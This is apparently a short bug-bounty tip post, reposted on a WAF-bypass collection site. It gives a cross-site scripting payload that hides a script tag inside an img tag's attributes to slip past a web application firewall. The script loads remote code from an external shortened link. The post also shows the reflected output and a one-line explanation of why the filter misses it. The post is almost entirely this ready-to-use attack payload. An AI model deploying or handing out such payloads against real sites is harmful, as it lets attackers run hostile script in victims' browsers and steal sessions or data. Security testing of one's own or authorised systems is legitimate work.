WAF bypass XSS by _Bugbountytips_

Date: March 29, 2021Author: wafbypass

XSS WAF Bypass:

<img+a=’a+<!–‘+a=”>”‘+”<script+a+src=https://t.co/Qf3AbxaZ2V>a</script>

Reflected as:
<img a=’a <!–‘ a=”>”‘ “<script a src=https://t.co/Qf3AbxaZ2V>a</script>

Explanation: Script tags don’t work inside a <img> tags so the WAF was allowing me to add them 1/2… https://t.co/BDmVduQmdx

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools